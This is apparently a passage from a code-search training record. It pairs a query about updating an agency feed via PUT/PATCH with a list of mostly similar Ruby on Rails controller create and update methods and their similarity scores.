"def create\n @ad = Ad.new(ad_params)\n\n respond_to do |format|\n if @ad.save\n format.html { redirect_to @ad, notice: 'Ad was successfully created.' }\n format.json { render :show, status: :created, location: @ad }\n else\n format.html { render :new }\n format.json { render json: @ad.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @announcement = Announcement.new(params[:announcement])\n\n respond_to do |format|\n if @announcement.save\n format.html { redirect_to @announcement, notice: 'Announcement was successfully created.' }\n format.json { render json: @announcement, status: :created, location: @announcement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @announcement = Announcement.new(permitted_params)\n\n respond_to do |format|\n if @announcement.save\n format.html { redirect_to announcements_path, notice: 'Announcement was successfully created.' }\n format.json { render action: 'show', status: :created, location: @announcement }\n else\n format.html { render action: 'new' }\n format.json { render json: @announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @fundamental_announcement = Fundamental::Announcement.new(params[:fundamental_announcement])\n @fundamental_announcement.author = current_backend_user\n\n respond_to do |format|\n if @fundamental_announcement.save\n format.html { redirect_to @fundamental_announcement, notice: 'Announcement was successfully created.' }\n format.json { render json: @fundamental_announcement, status: :created, location: @fundamental_announcement }\n else\n format.html { render action: \"new\" }\n format.json { render json: @fundamental_announcement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n #@opportunity = Opportunity.new(params[:opportunity])\n #@building = Building.find(params[:building_id])\n \n respond_to do |format|\n if @opportunity.save\n flash[:notice] = 'Opportunity was successfully created.'\n format.html { redirect_to(opportunity_path(@opportunity)) }\n format.xml { render :xml => @opportunity, :status => :created, :location => @opportunity }\n else\n flash[:error] = 'Opportunity could not be created.'\n format.html { render :action => \"new\" }\n format.xml { render :xml => @opportunity.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @agent = Agent.new(params[:agent])\n if user_signed_in? && current_user.agent.agency?\n @agent.parent_id = current_user.agent.id\n end\n respond_to do |format|\n if @agent.save\n format.html { redirect_to(@agent, :notice => 'Ihr Auftragnehmerprofil wurde erfolgreich erstellt.') }\n format.xml { render :xml => @agent, :status => :created, :location => @agent }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @agent.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(params[:hotel])\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render json: @hotel, status: :created, location: @hotel }\n else\n format.html { render action: \"new\" }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ad = current_advertiser.ads.new(params[:ad])\n respond_to do |format|\n if @ad.save\n format.html { redirect_to(@ad, :notice => 'Ad was successfully created.') }\n format.xml { render :xml => @ad, :status => :created, :location => @ad }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @ad.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @admin_agency = Admin::Agency.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @admin_agency }\n end\n end",
"def create\n @test_dep_collector = TestDepCollector.new(test_dep_collector_params)\n\n respond_to do |format|\n if @test_dep_collector.save\n format.html {redirect_to @test_dep_collector, notice: 'Test dep collector was successfully created.'}\n format.json {render :show, status: :created, location: @test_dep_collector}\n else\n format.html {render :new}\n format.json {render json: @test_dep_collector.errors, status: :unprocessable_entity}\n end\n end\n end",
"def add_tenant_circle(args = {}) \n post(\"/tenantcircles.json/\", args)\nend",
"def create\n @tracker = Tracker.new(tracker_params)\n\n if @tracker.save\n render json: @tracker, status: :created, location: @tracker\n else\n render json: @tracker.errors, status: :unprocessable_entity\n end\n end",
"def create\n @attending = Attending.new(attending_params)\n\n respond_to do |format|\n if @attending.save\n format.html { redirect_to @attending, notice: 'Attending was successfully created.' }\n format.json { render :show, status: :created, location: @attending }\n else\n format.html { render :new }\n format.json { render json: @attending.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @assay = Assay.new(params[:assay])\n\n respond_to do |format|\n if @assay.save\n format.html { redirect_to @assay, notice: 'Assay was successfully created.' }\n format.json { render json: @assay, status: :created, location: @assay }\n else\n format.html { render action: \"new\" }\n format.json { render json: @assay.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @google_analytic = GoogleAnalytic.new(google_analytic_params)\n render json: @google_analytic.errors unless @google_analytic.save\n end",
"def create\n\t\tdestId = params[:destination_id]\n\t\tdestination = Destination.find_by_id(destId)\n\t\titinerary = Itinerary.create({tags: itinerary_params[:tags].split(\" \")})\n\t\ta = activity_params.first\n\t\tactivity = itinerary.activities.create({title: a[:title], tip: a[:tip], location: a[:location], photo: a[:photo], highlight: a[:highlight]})\n\t\trespond_with itinerary\n\tend",
"def create\n @ayudastemporal = Ayudastemporal.new(params[:ayudastemporal])\n\n respond_to do |format|\n if @ayudastemporal.save\n flash[:notice] = 'Ayudastemporal was successfully created.'\n format.html { redirect_to(@ayudastemporal) }\n format.xml { render :xml => @ayudastemporal, :status => :created, :location => @ayudastemporal }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @ayudastemporal.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @advertisement = current_user.ads.new(advertisement_params)\n\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to app_advertisements_url, notice: 'Advertisement was successfully created.' }\n format.json { render :show, status: :created, location: @advertisement }\n else\n format.html { render :new }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @engagement = current_user.engagements.new(engagement_params_with_school)\n if @engagement.save\n render :show, status: :created, location: api_v2_engagement_url(@engagement)\n else\n puts @engagement.errors.full_messages\n render json: @engagement.errors, status: :unprocessable_entity\n end\n end",
"def create\n @arsenal = Arsenal.new(arsenal_params)\n\n respond_to do |format|\n if @arsenal.save\n format.html { redirect_to @arsenal, notice: 'Arsenal was successfully created.' }\n format.json { render :show, status: :created, location: @arsenal }\n else\n format.html { render :new }\n format.json { render json: @arsenal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def agency_params\n params.require(:agency).permit(I18n.t('agencies_controller.agency_params').map(&:to_sym))\n end",
"def create(params)\n post_url = url\n LightspeedCall.make('POST') { HTTParty.post(post_url, body: params.to_json, headers: {Authorization: \"Bearer #{LightspeedApi::OauthGrant.token}\", 'Accept' => 'application/json', 'Content-Type' => 'application/json' }) }\n end",
"def create\n HTTParty.post(create_url, :options => { :headers => HEADERS })\n end",
"def create_hotel(name:, address:)\n Hotel.create(\n name: name,\n address: address\n )\nend",
"def create\n @ag_apartment = Ag::Apartment.new(ag_apartment_params)\n\n respond_to do |format|\n if @ag_apartment.save\n format.html { redirect_to @ag_apartment, notice: 'Apartment was successfully created.' }\n format.json { render :show, status: :created, location: @ag_apartment }\n else\n format.html { render :new }\n format.json { render json: @ag_apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @aadt = Aadt.new(params[:aadt])\n\n respond_to do |format|\n if @aadt.save\n format.html { redirect_to @aadt, notice: 'Aadt was successfully created.' }\n format.json { render json: @aadt, status: :created, location: @aadt }\n else\n format.html { render action: \"new\" }\n format.json { render json: @aadt.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @encyclopaedia = Encyclopaedia.new(params[:encyclopaedia])\n\n respond_to do |format|\n if @encyclopaedia.save\n flash[:notice] = 'Encyclopaedia was successfully created.'\n format.html { redirect_to(@encyclopaedia) }\n format.xml { render :xml => @encyclopaedia, :status => :created, :location => @encyclopaedia }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @encyclopaedia.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(hotel_params)\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render :show, status: :created, location: @hotel }\n else\n format.html { render :new }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @hotel = Hotel.new(hotel_params)\n\n respond_to do |format|\n if @hotel.save\n format.html { redirect_to @hotel, notice: 'Hotel was successfully created.' }\n format.json { render :show, status: :created, location: @hotel }\n else\n format.html { render :new }\n format.json { render json: @hotel.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # Get the variables passed in from params on create\n @expense = Expense.new(expense_params)\n\n if @expense.save\n render json: @expense, status: :created, location: @expense\n else\n render json: @expense.errors, status: :unprocessable_entity\n end\n end",
"def create\n @advertise = Advertise.new(advertise_params)\n\n respond_to do |format|\n if @advertise.save\n format.html { redirect_to @advertise, notice: 'Advertise was successfully created.' }\n format.json { render :show, status: :created, location: @advertise }\n else\n format.html { render :new }\n format.json { render json: @advertise.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @ag_country = Ag::Country.new(ag_country_params)\n\n respond_to do |format|\n if @ag_country.save\n format.html { redirect_to @ag_country, notice: 'Country was successfully created.' }\n format.json { render :show, status: :created, location: @ag_country }\n else\n format.html { render :new }\n format.json { render json: @ag_country.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @advertise = Advertise.new(advertise_params)\n\n respond_to do |format|\n if @advertise.save\n format.html { redirect_to @advertise, notice: \"Advertise was successfully created.\" }\n format.json { render :show, status: :created, location: @advertise }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @advertise.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n # @advertisement = Advertisement.new(params[:advertisement])\n respond_to do |format|\n if @advertisement.save\n format.html { redirect_to @advertisement, notice: 'Advertisement was successfully created.' }\n format.json { render json: @advertisement, status: :created, location: @advertisement }\n else\n format.html { render action: \"new\", notice: 'Advertisement was NOT successfully created.' }\n format.json { render json: @advertisement.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n \n \n\t@attending = current_user.attendings.build(params[:attending])\n\n respond_to do |format|\n if @attending.save\n\t \n format.html { redirect_to @attending, notice: 'Your RSVP was successfully created.' }\n format.json { render json: @attending, status: :created, location: @attending }\n else\n format.html { render action: \"new\" }\n format.json { render json: @attending.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @opportunity = Opportunity.new(params[:opportunity])\n\n respond_to do |format|\n if @opportunity.save\n format.html { redirect_to @opportunity, notice: 'Opportunity was successfully created.' }\n format.json { render json: @opportunity, status: :created, location: @opportunity }\n else\n @supplier_accounts = SupplierAccount.approved.order 'fantasy_name'\n \n format.html { render action: \"new\" }\n format.json { render json: @opportunity.errors, status: :unprocessable_entity }\n end\n end\n end"
] | [
"0.7524271",
"0.74258316",
"0.7219422",
"0.69869757",
"0.6933055",
"0.6844494",
"0.6835852",
"0.66698694",
"0.6668519",
"0.6613647",
"0.660936",
"0.6579963",
"0.6416047",
"0.64136416",
"0.63984895",
"0.63452095",
"0.6283765",
"0.62245864",
"0.6209959",
"0.61748606",
"0.6084868",
"0.60846895",
"0.60715353",
"0.60625076",
"0.60493433",
"0.60113597",
"0.5998622",
"0.59904253",
"0.59629",
"0.5959274",
"0.5909114",
"0.5900243",
"0.58987",
"0.58802736",
"0.58762616",
"0.58743495",
"0.58467275",
"0.58408874",
"0.5834124",
"0.5833057",
"0.58224165",
"0.58002377",
"0.57955647",
"0.57941765",
"0.57848024",
"0.5782109",
"0.577762",
"0.57759655",
"0.5762098",
"0.5749528",
"0.5740347",
"0.57396364",
"0.5724769",
"0.5720691",
"0.57150024",
"0.5712457",
"0.5710516",
"0.5696447",
"0.5693543",
"0.5685018",
"0.5682827",
"0.5677778",
"0.5676176",
"0.56721354",
"0.56699204",
"0.56654114",
"0.56616396",
"0.56578916",
"0.5656042",
"0.56532425",
"0.5646464",
"0.56446236",
"0.56383824",
"0.56367975",
"0.5627084",
"0.56265265",
"0.5624415",
"0.5623103",
"0.56213605",
"0.5597242",
"0.55913806",
"0.5589478",
"0.558814",
"0.558654",
"0.55824566",
"0.5581161",
"0.55778426",
"0.55721825",
"0.5570558",
"0.55645484",
"0.55643",
"0.5559529",
"0.5559529",
"0.55496204",
"0.5545852",
"0.5544896",
"0.5544023",
"0.5540396",
"0.55372334",
"0.55365974"
] | 0.7636001 | 0 |
PUT/PATCH agencyfeed.json update the configuration of agency and category | def update
@agencyfeed.update! agencyfeed_params
render :show, status: :ok
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def update\n json_update(category,category_params, Category)\n end",
"def UpdateCategory params = {}\n \n APICall(path: 'categories.json',method: 'PUT',payload: params.to_json)\n \n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update\n Category.update(params[:category].keys, params[:category].values)\n\n redirect_to admin_ads_path\n end",
"def update!(**args)\n @category_id = args[:category_id] if args.key?(:category_id)\n @confidence = args[:confidence] if args.key?(:confidence)\n end",
"def update\n respond_to do |format|\n if @agendacategory.update(agendacategory_params)\n format.html { redirect_to @agendacategory, notice: 'Agendacategory was successfully updated.' }\n format.json { render :show, status: :ok, location: @agendacategory }\n else\n format.html { render :edit }\n format.json { render json: @agendacategory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_category_attribute_definition(kapp_slug, name, body, headers=default_headers)\n @logger.info(\"Updating the \\\"#{name}\\\" Category attribute definition in the \\\"#{kapp_slug}\\\" kapp.\")\n put(\"#{@api_url}/kapps/#{kapp_slug}/categoryAttributeDefinitions/#{encode(name)}\",body, headers)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @tag = args[:tag] if args.key?(:tag)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n end",
"def update\n @agency = Agency.find(params[:id])\n\n if @agency.update(agency_params)\n #head :no_content\n render json: @agency, status: :accepted, location: @agency #sera? status accepted? \n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def update!(**args)\n @additional_categories = args[:additional_categories] if args.key?(:additional_categories)\n @primary_category = args[:primary_category] if args.key?(:primary_category)\n end",
"def update\n respond_to do |format|\n if @alien_category.update(alien_category_params)\n format.html { redirect_to @alien_category, notice: 'Alien category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @alien_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @agency_associations = args[:agency_associations] if args.key?(:agency_associations)\n end",
"def update!(**args)\n @app_store_link = args[:app_store_link] if args.key?(:app_store_link)\n @category_id = args[:category_id] if args.key?(:category_id)\n @category_name = args[:category_name] if args.key?(:category_name)\n @chart_type = args[:chart_type] if args.key?(:chart_type)\n @rank = args[:rank] if args.key?(:rank)\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @domain = args[:domain] if args.key?(:domain)\n @features = args[:features] if args.key?(:features)\n @score = args[:score] if args.key?(:score)\n end",
"def update\n respond_to do |format|\n if @advert_category.update(advert_category_params)\n format.html { redirect_to @advert_category, notice: 'Advert category was successfully updated.' }\n format.json { render :show, status: :ok, location: @advert_category }\n else\n format.html { render :edit }\n format.json { render json: @advert_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @accolade_category.update(accolade_category_params)\n format.html { redirect_to edit_admin_accolade_category_path(@accolade_category), notice: 'Accolade category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @accolade_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @feed_category = FeedCategory.find(params[:id])\n\n respond_to do |format|\n if @feed_category.update_attributes(params[:feed_category])\n format.html { redirect_to @feed_category, :notice => 'Feed category was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @feed_category.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n if @category.update(category_params)\n render json: @category, status: :ok\n else\n render json: @category.errors, status: :unprocessable_entity\n end\n end",
"def update\n @agency = Agency.find(params[:id])\n\n if @agency.update(agency_params)\n #head :no_content\n render json: @agency, status: :accepted, location: @agency #sera? status accepted? \n else\n render json: @agency.errors, status: :unprocessable_entity\n end\n end",
"def update\n @category.update(category_params)\n end",
"def update!(**args)\n @ad_formats = args[:ad_formats] if args.key?(:ad_formats)\n @territories = args[:territories] if args.key?(:territories)\n end",
"def update\n respond_to do |format|\n if @badge_category.update(badge_category_params)\n format.html { redirect_to @badge_category, notice: 'Badge category was successfully updated.' }\n format.json { render :show, status: :ok, location: @badge_category }\n else\n format.html { render :edit }\n format.json { render json: @badge_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @incidentcategory.update(incidentcategory_params)\n json_response(@incidentcategory)\n else\n render json: @incidentcategory.errors, status: :unprocessable_entity\n end\n end\n end",
"def update_factcat\n cat = Category.find(self.category_id)\n self.factcat_id = cat.get_factcat_from_category.id\n self.save!\n end",
"def update\n\t @expense = Expense.find(params[:id])\n\t @expense.categories = params[:categories].split(',')\n\n respond_to do |format|\n if @expense.update_attributes(params[:expense])\n add_tagger_to_taggings(@expense)\n format.html { redirect_to @expense, notice: 'Expense was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @expense.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @adcategory.update(adcategory_params)\n format.html { redirect_to @adcategory, notice: 'Adcategory was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @adcategory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @confidence = args[:confidence] if args.key?(:confidence)\n @is_restricted = args[:is_restricted] if args.key?(:is_restricted)\n @mid = args[:mid] if args.key?(:mid)\n end",
"def update!(**args)\n @category_name = args[:category_name] if args.key?(:category_name)\n end",
"def update\n respond_to do |format|\n\n intent_request = @api_ai_client.create_intents_request\n response = intent_request.update(@category.intent_id, param_options)\n\n if response.is_a?(Hash) && response[:status][:code].eql?(200)\n\n contexts_templates = { contexts: category_params[:contexts].split(\",\"), templates: category_params[:templates].split(\",\") }\n\n if @category.update(category_params.merge(contexts_templates))\n format.html { redirect_to @category, notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n else\n @notice = response.message\n\n format.html { render :new }\n format.json { render json: { error: response.message }, status: response.code}\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @classifier_version = args[:classifier_version] if args.key?(:classifier_version)\n @taxonomy = args[:taxonomy] if args.key?(:taxonomy)\n @taxonomy_name = args[:taxonomy_name] if args.key?(:taxonomy_name)\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.json { render :show, status: :ok, location: @category }\n else\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @brand_category.update(brand_category_params)\n head :no_content\n else\n render json: @brand_category.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to api_v1_category_path(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @accessory_category = AccessoryCategory.find(params[:id])\n\n if @accessory_category.update(accessory_category_params)\n audit(@accessory_category, current_user)\n head :no_content\n else\n render json: @accessory_category.errors, status: :unprocessable_entity\n end\n end",
"def update\n if @agency.update(agency_params)\n @agency = Agency.new\n @agencies = Agency.all\n @flag = true\n else\n @flag = false\n end\n end",
"def update\n @category.update_attributes(params[:category])\n respond_with(@category)\n end",
"def update!(**args)\n @category_group = args[:category_group] if args.key?(:category_group)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @consumer_category = ConsumerCategory.find(params[:id])\n\n respond_to do |format|\n if @consumer_category.update_attributes(params[:consumer_category])\n format.html { redirect_to @consumer_category, notice: 'Consumer category was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @consumer_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n category= Category.find(params[:id])\n category.update(category_params)\n \n end",
"def update\n respond_to do |format|\n if @gt_category.update(gt_category_params)\n format.html { redirect_to @gt_category, notice: 'Gt category was successfully updated.' }\n format.json { render :show, status: :ok, location: @gt_category }\n else\n format.html { render :edit }\n format.json { render json: @gt_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @company = Company.find(params[:id])\n params[:company][:category_ids] ||= []\n respond_to do |format|\n if @company.update_attributes(params[:company])\n format.html { redirect_to(@company, :notice => 'Company was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @company.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @auto_tagging_enabled = args[:auto_tagging_enabled] if args.key?(:auto_tagging_enabled)\n @customer_id = args[:customer_id] if args.key?(:customer_id)\n @kind = args[:kind] if args.key?(:kind)\n end",
"def update\n @abuse_category = AbuseCategory.find(params[:id])\n\n respond_to do |format|\n if @abuse_category.update_attributes(params[:abuse_category])\n format.html { redirect_to @abuse_category, notice: 'Abuse category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @abuse_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_categories(categories, options = {} )\n options.merge!(:docid => self.docid, :categories => categories)\n resp = @conn.put do |req|\n req.url \"categories\"\n req.body = options.to_json\n end\n\n resp.status \n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @label = args[:label] if args.key?(:label)\n end",
"def update\n @expense = @household.expenses.find(params[:id])\n respond_to do |format|\n if @expense.update(expense_params)\n\n # c = Category.find cat_params[:category].to_i\n #\n # if @expense.categories << c\n # puts 'SUPER'\n # else\n # puts 'SCHEIßE'\n # end\n\n flash[:alert] = 'Expense was successfully updated.'\n format.html {redirect_to household_expenses_path(@household)}\n format.json {render :show, status: :ok, location: @expense}\n else\n format.html {render :edit}\n format.json {render json: @expense.errors, status: :unprocessable_entity}\n end\n end\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @total_category_count = args[:total_category_count] if args.key?(:total_category_count)\n end",
"def update!(**args)\n @categories = args[:categories] if args.key?(:categories)\n @next_page_token = args[:next_page_token] if args.key?(:next_page_token)\n @total_category_count = args[:total_category_count] if args.key?(:total_category_count)\n end",
"def update\n if @category.update(params[:category])\n head :no_content\n else\n render json: @category.errors, status: :unprocessable_entity\n end\n end",
"def update\n @headline = t(:update_category)\n @category = Category.find(params[:id])\n\n respond_to do |format|\n if @category.update_attributes(params[:category])\n format.html { redirect_to @category, notice: t(:updated_category_success) }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\r\n @category = Category.find(params[:id])\r\n \r\n respond_to do |format|\r\n if @category.update_attributes(params[:category])\r\n flash[:notice] = 'Category was successfully updated.'\r\n format.html { redirect_to(admin_category_path) }\r\n format.xml { head :ok }\r\n else\r\n @businesses = Business.find(:all, :order => :name)\r\n format.html { render :action => \"edit\" }\r\n format.xml { render :xml => @category.errors, :status => :unprocessable_entity }\r\n end\r\n end\r\n end",
"def update!(**args)\n @job_categories = args[:job_categories] if args.key?(:job_categories)\n @locations = args[:locations] if args.key?(:locations)\n end",
"def update\n respond_to do |format|\n if @business_event_category.update(business_event_category_params)\n format.html { redirect_to @business_event_category, notice: 'Business event category was successfully updated.' }\n format.json { render :show, status: :ok, location: @business_event_category }\n else\n format.html { render :edit }\n format.json { render json: @business_event_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to admin_good_categories_url, notice: 'GoodCategory was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @coach_category.update(coach_category_params)\n format.html { redirect_to @coach_category, notice: 'Categoria de treinador foi actualizada com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @coach_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category = args[:category] if args.key?(:category)\n @description = args[:description] if args.key?(:description)\n @details = args[:details] if args.key?(:details)\n @reason = args[:reason] if args.key?(:reason)\n @state = args[:state] if args.key?(:state)\n end",
"def update\n @advocacy = Advocacy.find(params[:id])\n\n respond_to do |format|\n if @advocacy.update_attributes(params[:advocacy])\n format.html { redirect_to @advocacy, notice: 'Advocacy was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @advocacy.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @category = Category.find(params[:id])\n\n respond_to do |format|\n if @category.update_attributes(params[:category])\n format.html { redirect_to api_v1_categories_path, notice: 'Category was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @category.update(category_params)\n format.html { redirect_to backend_shop_branch_category_path(@current_shop.slug, @current_branch, @category), notice: t('Category was successfully updated.') }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @organization_catagory.update(organization_catagory_params)\n format.html { redirect_to @organization_catagory, notice: 'Organization catagory was successfully updated.' }\n format.json { render :show, status: :ok, location: @organization_catagory }\n else\n format.html { render :edit }\n format.json { render json: @organization_catagory.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @category.assign_attributes(category_params)\n respond_to do |format|\n if @category.save\n format.html { redirect_to edit_category_url(@category), notice: 'Category was successfully updated.' }\n format.json { render :show, status: :ok, location: @category }\n else\n format.html { render :edit }\n format.json { render json: @category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update!(**args)\n @category_group_state = args[:category_group_state] if args.key?(:category_group_state)\n @category_state = args[:category_state] if args.key?(:category_state)\n end",
"def update\n respond_to do |format|\n if @schema_category.update(schema_category_params)\n format.html { redirect_to schema_categories_path, notice: 'Schema category was successfully updated.' }\n format.json { render :show, status: :ok, location: @schema_category }\n else\n format.html { render :edit }\n format.json { render json: @schema_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n # update attribute\n if @category.update_attributes(category_params)\n # flash message\n flash.now[:success] = \"更新完了しました。\"\n # get category data\n all_categories\n else\n render 'edit'\n end\n end",
"def update\n respond_to do |format|\n if @category.update_attributes(params[:category])\n if @category.cambio_algo\n format.html {redirect_to notify_changes_category_url}\n else\n format.html { redirect_to(@category, :notice => t('scaffold.notice.updated', :item=> Category.model_name.human)) }\n format.xml { head :ok }\n end\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @category.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @top_category.update(top_category_params)\n format.json { render :show, status: :ok, location: @top_category }\n else\n format.json { render json: @top_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n category = Documents::Category.find(params[:id])\n category.update!(category_params)\n redirect_to categories_path\n end",
"def set_agendacategory\n @agendacategory = Agendacategory.find(params[:id])\n end",
"def update\n @category = Category.find(params[:id])\n @category.update_attributes(params[:category])\n respond_with(@category, location: categories_url)\n end",
"def update\n respond_to do |format|\n if @accommodation_category.update(accommodation_category_params)\n format.html { redirect_to @accommodation_category, notice: 'Accommodation category was successfully updated.' }\n format.json { render :show, status: :ok, location: @accommodation_category }\n else\n format.html { render :edit }\n format.json { render json: @accommodation_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @agency_type = AgencyType.find(params[:id])\n\n respond_to do |format|\n if @agency_type.update_attributes(params[:agency_type])\n format.html { redirect_to @agency_type, notice: 'Agency type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @agency_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @audit_feedback_category.update(audit_feedback_category_params)\n format.html { redirect_to audit_feedback_categories_path }\n format.json { render :show, status: :ok, location: @audit_feedback_category }\n else\n format.html { render :edit }\n format.json { render json: @audit_feedback_category.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @expense.categories_expenses.destroy_all\n if (params[:expense][:categories]) \n params[:expense][:categories].each do |category_id|\n category_id = category_id.to_i\n if category_id > 0\n @expense.categories << Category.find(category_id)\n end\n end\n end\n\n respond_to do |format|\n if @expense.update_attributes(params[:expense])\n flash[:notice] = 'Expense was successfully updated.'\n format.html { redirect_to(@expense) }\n format.xml { head :ok }\n format.iphone { redirect_to :controller => \"welcome\", :action => \"home\" }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @expense.errors, :status => :unprocessable_entity }\n format.iphone { render :action => \"edit\" }\n end\n end\n end",
